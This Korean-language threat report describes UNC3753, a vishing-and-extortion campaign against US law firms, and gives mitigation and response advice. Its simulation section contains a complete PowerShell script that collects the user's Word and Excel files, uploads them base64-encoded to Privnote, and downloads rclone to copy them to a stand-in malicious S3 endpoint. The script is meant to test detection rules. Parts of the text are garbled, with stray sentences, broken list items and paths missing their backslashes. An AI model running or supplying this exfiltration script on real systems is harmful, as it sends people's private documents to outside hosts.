법률 자문 구하기: 미국 법률 회사들을 겨냥한 지속적인 표적 공격

요약

UNC3753으로 추적된 재정적 동기 부여 위협 클러스터가 피해자를 속여 원격 모니터링 및 관리 소프트웨어를 설치하도록 하는 보이스 피싱 캠페인을 운영하고 있습니다. 접근이 확립되면 행위자들은 민감한 법적 및 금융 정보를 탈취하고, 공개 노출을 위협하여 피해 조직을 협박합니다. 이 캠페인은 특히 법률 회사와 같은 미국 전문 서비스 기업에 초점을 맞추고 있으며, 사이버 기반과 물리적 데이터 절도가 모두 포함될 수 있습니다.

조사

Mandiant는 초기 보이스 피싱 콜부터 데이터 절도 및 협박까지의 전체 침입 사이클을 관찰했으며, 때로는 단 하루 안에 발생하기도 합니다. 피해자들은 AnyDesk, Bomgar, 맞춤형 SuperOps 설치 프로그램과 같은 원격 데스크톱 및 RMM 소프트웨어 사용에 설득되었습니다. curl 명령을 실행합니다. 데이터 축출은 WinSCP, Rclone, 또는 소비자 클라우드 저장소 계정에 직접 업로드하는 도구를 통해 수행되었습니다.

완화

조직은 보이스 피싱 시도를 인식하도록 직원들에게 교육하고, 모든 원격 지원 요청에 대해 엄격한 확인 절차를 시행하고, 승인되지 않은 RMM 및 화면 공유 도구를 차단해야 합니다. 이동식 미디어를 비활성화하고, 클라우드 스토리지 또는 FTP 대상으로의 비정상적인 아웃바운드 전송을 모니터링하며, VDI에 조건부 접근 관리를 적용하고, 중요 문서 저장소에 MFA를 강제 적용함으로써 위험을 줄일 수 있습니다.

대응

이 활동이 감지되면 즉시 영향을 받은 엔드포인트를 격리하고, 승인되지 않은 원격 세션을 종료하고, 설치된 RMM 바이너리를 제거하십시오. 조사관은 명령 줄 기록, 레지스트리 변경 및 예약된 작업 아티팩트를 수집하여 포렌식 검토해야 합니다. 손상된 자격 증명은 재설정하고, 데이터 탈출은 평가되어야 하며, 협박이 시작된 경우 법 집행 기관의 개입을 고려해야 합니다.

시뮬레이션 실행

사전 조건: 텔레메트리 및 기본 설정 사전 비행 점검에 통과해야 합니다.

이유: 이 섹션은 탐지 규칙을 유발하도록 설계된 상대 기술의 정밀한 실행을 설명합니다. 명령 및 서사는 식별된 TTP를 직접 반영해야 하며 탐지 논리에 의해 기대되는 정확한 텔레메트리를 생성해야 합니다. 추상적이거나 관련 없는 예는 오진으로 이어질 수 있습니다.

• 공격 서사 및 명령:

  1. 정찰 및 데이터 준비 (T1005, T1083):
     적이 사용자 디렉토리를 나열하고 모든 *.docx and *.xlsx 파일을 준비 폴더로 복사 C:TempStagedData.

  2. Privnote를 통한 업로드 (T1567.002):
     PowerShell을 사용하여 공격자는 각 파일을 읽고, 내용을 base‑64로 인코딩하여 https://privnote.com/api/note에 게시합니다. 명령줄에는 URL이 포함되어 selection_privnote 조건을 만족시킵니다.

  3. Rclone을 사용한 전송 (T1020):
     공격자는 실행합니다 rclone.exe (즉석에서 다운로드) 준비된 파일을 악성 S3 버킷으로 푸시합니다. 프로세스 이름 ‘rclone.exe’가 selection_tool.

  4. 기준과 일치합니다. 정리:

• 준비 폴더와 남아 있는 모든 바이너리를 삭제합니다. 회귀 테스트 스크립트: (파워셸 - 독립형, 외부 종속성 없음).)

  (파워셸 - 독립형, 외부 종속성 없음)

• # ————————————————- # UNC3753 유출 시뮬레이션 – PowerShell # ————————————————- # 1. 준비 디렉토리 준비 $staging = “$env:USERPROFILETempStagedData” New-Item -ItemType Directory -Force -Path $staging | Out-Null # 2. 샘플 데이터 복사 (데이터 수집 시뮬레이션) Get-ChildItem -Path “$env:USERPROFILEDocuments” -Include *.docx, *.xlsx -Recurse -ErrorAction SilentlyContinue | ForEach-Object { Copy-Item -Path $_.FullName -Destination $staging -Force } # 3. Privnote에 각 파일 업로드 (웹 서비스 유출) $privnoteUrl = “https://privnote.com/api/note” Get-ChildItem -Path $staging -File | ForEach-Object { $content = [Convert]::ToBase64String([IO.File]::ReadAllBytes($_.FullName)) $body = @{ text = $content } # 명령줄에 URL이 나타남 -> selection_privnote 트리거 Invoke-WebRequest -Uri $privnoteUrl -Method POST -Body $body -UseBasicParsing | Out-Null } # 4. Rclone 다운로드 (존재하지 않으면) 및 S3를 통한 유출 $rcloneExe = “$env:TEMPrclone.exe” if (-not (Test-Path $rcloneExe)) { Invoke-WebRequest -Uri “https://downloads.rclone.org/rclone-current-windows-amd64.zip” -OutFile “$env:TEMPrclone.zip” Expand-Archive -Path “$env:TEMPrclone.zip” -DestinationPath $env:TEMP -Force Move-Item -Path (Get-ChildItem “$env:TEMPrclone-*-windows-amd64rclone.exe”).FullName -Destination $rcloneExe -Force } # 악의적인 S3 버킷 구성 – 임시 파일에 설정 기록 $rcloneConfig = @” [malicious type = s3 provider = AWS access_key_id = AKIAFAKEKEY secret_access_key = fakeSecretKey123 region = us-east-1 endpoint = https://malicious-s3.example.com “@ $configPath = “$env:TEMPrclone.conf” $rcloneConfig | Set-Content -Path $configPath -Encoding ASCII # rclone 복사 실행 – 프로세스 이름 “rclone.exe”가 selection_tool 트리거 & $rcloneExe copy $staging “malicious:exfil” –config $configPath –log-level INFO # 5. 정리 Remove-Item -Recurse -Force $staging Remove-Item -Force $rcloneExe, $configPath

  정리 명령:

# 남아있는 WinSCP 또는 Rclone 프로세스를 종료 Get-Process -Name WinSCP, rclone -ErrorAction SilentlyContinue | Stop-Process -Force # 남은 임시 파일 삭제 (있을 경우) Remove-Item -Path “$env:TEMPWinSCP.exe”,”$env:TEMPWinSCP.zip”,”$env:TEMPrclone.zip”,”$env:TEMPrclone-*-windows-amd64″ -Recurse -Force -ErrorAction SilentlyContinue